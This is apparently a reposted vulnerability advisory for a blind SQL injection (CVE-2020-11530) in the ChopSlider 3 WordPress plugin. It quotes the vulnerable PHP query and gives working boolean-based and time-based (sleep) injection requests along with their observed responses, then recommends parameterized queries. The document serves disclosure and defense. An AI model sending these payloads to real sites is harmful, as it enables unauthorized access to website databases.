Share
## https://sploitus.com/exploit?id=PACKETSTORM:157607
----------------------------------------------------------------  
ChopSlider3 Wordpress Plugin SQL Injection  
----------------------------------------------------------------  
  
[-] Software Link:  
  
https://idangero.us/  
https://github.com/idangerous/Plugins  
  
  
[-] Affected Versions:  
  
ChopSlider version 3.  
  
  
[-] Vulnerability Description:  
  
A blind SQL injection vulnerability is present in Chop Slider 3, a  
Wordpress plugin. The vulnerability is introduced in  
'chopslider/get_script/index.php', and allows an attacker to execute  
arbitrary SQL queries in the context of the WP database user.  
  
The offending code is located on line 13 of  
'chopslider/get_script/index.php':  
  
$cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . '  
WHERE chopslider_id =' . $id);  
  
Example injection string:  
  
GET /wp-content/plugins/chopslider/get_script/?id=141217078 or 6702=6702  
(returns content-length 3055]  
GET /wp-content/plugins/chopslider/get_script/?id=141217078 or 6702=6703  
(returns content-length 1229]  
  
Blind delay-based SQL injection:  
  
GET /wp-content/plugins/chopslider/get_script/?id=141217078 or (SELECT  
sleep(10))=6312 [delays for 10 seconds]  
  
  
[-] Solution:  
  
Use of prepared statements with parameterized queries will fix this  
vulnerability.  
  
[-] Disclosure Timeline:  
  
[03/04/2020] - Issue reported to vendor. No response was received.  
[04/04/2020] - CVE number assigned.  
[07/05/2020] - Publication of this advisory.  
  
  
[-] CVE Reference:  
  
The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
assigned the name CVE-2020-11530 to this vulnerability.  
  
  
[-] Credits:  
  
Vulnerability discovered by Callum Murphy.